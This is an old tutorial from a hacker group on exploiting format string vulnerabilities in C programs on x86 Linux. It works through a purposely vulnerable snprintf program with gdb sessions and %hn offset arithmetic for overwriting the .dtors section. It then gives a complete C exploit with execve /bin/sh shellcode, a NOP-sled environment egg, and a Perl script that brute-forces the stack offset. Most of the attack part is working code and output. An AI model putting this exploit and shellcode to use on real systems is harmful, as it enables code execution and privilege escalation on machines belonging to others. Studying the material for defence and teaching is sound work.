=-Promisc Digital Research Group (http://www.promisc.org)-= =- -= =- Exploiting local format string holes on x86/linux -= =- The Itch (itchie@promisc.org) -= =- Presents -= A long time ago, in a galaxy far, far away .... --- A coder, its late at night, and he has to finish his program due tomorrow. Since its late and he is rushing, he forgets sometimes to use the proper format of snprintf, so he writes sometimes: snprintf (buf, sizeof(buf)-1, arg); instead of snprintf (buf, sizeof(buf)-1, "%s", arg); Now, without knowing, the programmer unintentionally gave us complete control over his program. With the method known as: format string exploitation. Now lets look at a short version of the above mentioned situation: -----------------fmt.c---------------- #include #include #include void vulnerable(char *arg) { char buf[1024]; char string[64]; strcpy (string, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); snprintf (buf, sizeof(buf)-1, arg); /* the vulnerability itself */ printf ("%s\n", buf); return; } int main(int argc, char **argv) { if (argc > 1) vulnerable(argv[1]); return (0); } -----------------fmt.c---------------- [itchie@bse fmt]$ gcc fmt.c -g -ggdb3 -o fmt (We use -g -ggdb3 for extra debugging information). [itchie@bse fmt]$ ./fmt BBBB BBBB [itchie@bse fmt]$ ./fmt %p 0x41414141 [itchie@bse fmt]$ ./fmt %p.%p.%p.%n Segmentation fault (core dumped) Interesting, the program gives a segmentation fault. Let's examine: [itchie@bse fmt]$ gdb -q fmt core Core was generated by `./fmt %p.%p.%p.%n'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x0016e817 in _IO_vfprintf (s=0xbffff5bc, format=0xbffffc62 "%p.%p.%p.%n", ap=0xbffff6dc) at vfprintf.c:1212 1212 vfprintf.c: No such file or directory. in vfprintf.c (gdb) x/i 0x0016e817 0x16e817 <_IO_vfprintf+2455>: mov %eax,(%ecx) (gdb) printf "eax: %08x\necx: %08x\n", $eax, $ecx eax: 00000021 ecx: 41414141 Well, that is very nice and interesting, the program crashes when it tries to copy the value of eax to the address of ecx. Now lets take a look of that what exactly happend. Why is eax 0x00000021 and ecx 0x41414141 ? 0x21 = 33 in decimal, now when we gave %p.%p.%p.%n as argument, we actually wrote 33 bytes, because %p.%p.%p = 0x41414141.0x41414141.0x41414141 which in return is 32 bytes (yes count the 0 and the x also) and with the %n at the end (1 byte) makes in total 33 bytes, or 0x21. So in this case we tried to write 0x21 to 0x41414141, which is an illegal address. How did we get 0x41414141? In the code of the vulnerable program you will see the following: strcpy (string, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); snprintf (buf, sizeof(buf)-1, arg); /* the vulnerability itself */ Apparently, when we write %p or %x, we see the contents of the string. A var that was processed before the vulnerability itself. So what happens, when a *printf function cant find a valid formatter, it starts hitting on its stack. This is all nice, but 0x41414141 is completely useless for us if we want to exploit the program, so lets investigate more. Lets try to give some valid data and then some formatters. [itchie@bse fmt]$ ./fmt "BBBB %x %x %x %x %x %x" BBBB 41414141 41414141 41414141 41414141 41414141 41414141 Hmm we are still hitting our stack in the area that was processed before the actual format string vulnerability. Useless, but wouldnt it be nice if it eventually would come to the snprintf function and start hitting on its own stack? Lets test: [itchie@bse fmt]$ ./fmt "BBBB %x %x %x %x %x %x %x %x %x %x %x %x %x %x" BBBB 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 414141 80482b4 Well it seems we are hitting something weird, by the looks of it, it looks like a heaplike address (0x080482b4). GDB is your friend. (lets break at the 24th line of the vulnerable program (the return function). [itchie@bse fmt]$ gdb -q fmt (gdb) set args "BBBB %x %x %x %x %x %x %x %x %x %x %x %x %x %x" (gdb) break 24 Breakpoint 1 at 0x80484ae: file fmt.c, line 24. (gdb) run Starting program: /home/itchie/public_html/stuff/exploits/fmt/fmt "BBBB %x %x %x %x %x %x %x %x %x %x %x %x %x %x" BBBB 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 414141 80482b4 Breakpoint 1, main (argc=2, argv=0xbffffaf4) at fmt.c:24 24 return (0); (gdb) x/x 0x080482b4 0x80482b4 : 0x080495f8 (gdb) x/i 0x080495f8 0x80495f8 <_GLOBAL_OFFSET_TABLE_+12>: pusha (gdb) Ok, it looks like that address jumps somewhere into the GOT section. We could use that address, but it would be much much easier if we could define our own address. So lets play some more with some extra %x's: [itchie@bse fmt]$ ./fmt "BBBB %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x" BBBB 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 414141 80482b4 0 1 42424242 Funny, 0x42424242 is BBBB, finally we hit the part of the stack of our input. It took us 17 %x's to get to our part of the stack. Now it really gets interesting, according to this, we can write any number to any address with %n. However we do have a problem. %n writes the bytes written on so far. This is no problem with low numbers, but think about it. If we want to write to for example: 0xbffffb10 then we have to write 3221224208 bytes to write our address. Thats a little bit to big to write all at once. (Older libc's cant handle very large addresses). So instead of writing a large address (a 32 bit word) we write a 16 bit word. A 16 bit word can hold a maximum of 65536. We do this by using %hn instead of %n. In other words, we must split our address 0xbffffb10 up into two parts, namely: 0xbfff (49151 dec) and 0xfb10 (64272). We have an address now, but to where should we write it?. We have many possibilities, the EIP, .dtor section, the GOT section. For the time being we choose a static address of the .dtor section. To retrieve the .dtor section we simple do: [itchie@bse fmt]$ objdump -h fmt|grep dtor 17 .dtors 00000008 080495e4 080495e4 000005e4 2**2 Our .dtor address is 0x080495e4 + 4. Because the stack on the intel architecture grows downards (from higher addresses to lower addressess), we must write the higher address first. We will write in 2 steps, first we write to 0x080495e8 + 2 and then to 0x080495e8. Remember, our input came back at the 17th %x. But we must count first how much bytes it actually takes. Lets count, we get this back when we give 17 %x's: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 414141 80482b4 0 1 (discard the spaces). The number of bytes are: 113 We have to write: 49151 - 8 = 49143 ^ ^ ^ ^---- The 2 addressess we write to. ^ ^---- 0xbfff This is the first write. And then we have to write our second address: 64272 - 49151 - 113 = 15008 ^ ^ ^ ^ ^ ^---- our stack popping (output of 17 %x's) ^ ^ ^ ^---- 0xbfff (we wrote that already ^ ^--- 0xfb10 This is our second write. So lets start constructing our format string: 0x080495e8+2 0x080495e8 %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %.49143u%hn %.15008u%hn Now as you can see this is a rather sloppy way, to pop the stack like that. Because maybe on another machine, you might not have exactly 113 bytes but maybe 110 or 116. To solve this, we use %number$. In this way we can do: %17$x to print out the 17 %x. This way also works with %number$hn. So instead of using the above format string we use the following: We also bypass the stackpopping, so in this case you should NOT deduct 113 from the second number (from 0xfb10). 0x080495e8+2 0x080495e8 %.49143u%17$hn %.15121u%18$hn ^ ^---- 15008 + 113 Or, in exploit code form: ---------fmtexpl1.c----------- /* Format string exploit for fmt.c * Coded by The Itch and Gyan Chawdhary */ #include #include #define NOP 0x90 #define EGGSIZE 2048 /* execve /bin/sh */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; int main(int argc, char *argv[]) { char *fmt; unsigned int low, high, i; char egg[EGGSIZE]; unsigned long smashaddr = 0x080495e8; /* overwrite */ unsigned long writeaddr = 0xbffffb10; /* write this */ char firsthalfdec, secondhalfdec; char splitaddr0, splitaddr1, splitaddr2, splitaddr3; splitaddr0 = (smashaddr & 0xff000000) >> 24; splitaddr1 = (smashaddr & 0x00ff0000) >> 16; splitaddr2 = (smashaddr & 0x0000ff00) >> 8; splitaddr3 = (smashaddr & 0x000000ff); /* writeaddr = 0xc0debabe; writeaddr & 0x0000ffff = 0xbabe; */ high = (writeaddr & 0xffff0000) >> 16; low = (writeaddr & 0x0000ffff); if(!(fmt = malloc(256))) {printf("malloc()\n"); exit(-1);} /* zero the memory */ memset(fmt, 0x00, 256); memset(egg, 0x00, EGGSIZE); /* shellcode preparation */ memset (egg, NOP, EGGSIZE - strlen (shellcode)); memcpy (egg + EGGSIZE - strlen (shellcode) - 1, shellcode, strlen (shellcode)); /* highest address must be written first, so 0xfb10 comes BEFORE * 0xbfff */ if(high < low) { sprintf(fmt, "%c%c%c%c" "%c%c%c%c" "%%.%ud%%17$hn" "%%.%ud%%18$hn", splitaddr3 + 2, splitaddr2, splitaddr1, splitaddr0, splitaddr3, splitaddr2, splitaddr1, splitaddr0, high - 8, low - high); } else { sprintf(fmt, "%c%c%c%c" "%c%c%c%c" "%%.%ud%%17$hn" "%%.%ud%%18$hn", splitaddr3 + 2, splitaddr2, splitaddr1, splitaddr0, splitaddr3, splitaddr2, splitaddr1, splitaddr0, low - 8, high - low); } /* create enviroment var with our shellcode */ egg[EGGSIZE -1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); /* format it! */ execl("./fmt", "fmt", fmt, NULL); return 0; } --------fmtexpl1.c------------- Now, if everything went well, you will see ALOT of 0's going by on the screen. And if you are lucky you will see a shell too after that, something like: sh-2.04$ Otherwise you will see alot of 0's and then maybe the message something like: segmentation fault or Illegal instruction. That is ok, but it means our format string wasnt entirely correct, but we can examine what exactly happend by using the core file. $ gdb -q fmt core Core was generated by `fmt %.49143d%17$hn%.15008%18$hn'. Program terminated with signal, Illegal instruction. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0xbffffb10 in ?? () (gdb) This is good, we did overwrite the .dtor section and that caused our EIP to change. However we did not manage to reach our shellcode. To increase our chances of reaching the shellcode we can do 2 things. First off all we can make #define EGGSIZE 2048 bigger to maybe 4096, or even bigger, then eventually we will reach our shellcode. A more efficient way would be to use the current esp and calculate our shellcode from that position. Either way you choose, it will work. I choosed in our case the first one. $ ./fmtexpl1 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000 .... sh-2.04$ And we got a shell. This was a basic example of a format string exploit. In many ways it will probably take much more stackpopping until you reach your own input. Best thing to do in such cases would be to use a small bruteforce utility like the one below: -----bruteforce.pl------ #!/usr/bin/perl # created by lucipher my $proggy = "./fmt "; my $i, $x, $seq; for ($i = 0; $i < 500; $i++) { $seq = $i * 1; $x .= " %x " . $seq; if ((system sprintf("%s \"BBBB %s\"|grep 4242 >/dev/null\n", $proggy, $x)) == 0) { $seq++; print "%x: $seq\nstring: 4242\n"; exit; } } -----bruteforce.pl------ $ ./bruteforce.pl %x: 17 string: 42424242 $ With this program we can quickly determine how much %x'es are needed. In our example program it only took 17 %x'es, but in larger programs it can take many more. I think i gave you all the basic format string explotation knowledge, the rest you should be able to find out yourself. Oh btw, functions vulnerable to wrong formatting are: fprintf(); printf(); sprintf(); snprintf(); vfprintf(); vprintf(); vsprintf(); vsnprintf(); setproctitle(); syslog(); and many others like err*, verr*, warn* and vwarn*. Just too bad that format strings are rarely seen these days, they were big around the year 2000. Nevertheless, they are intresting enough to know more about. -- - The Itch - itchie@promisc.org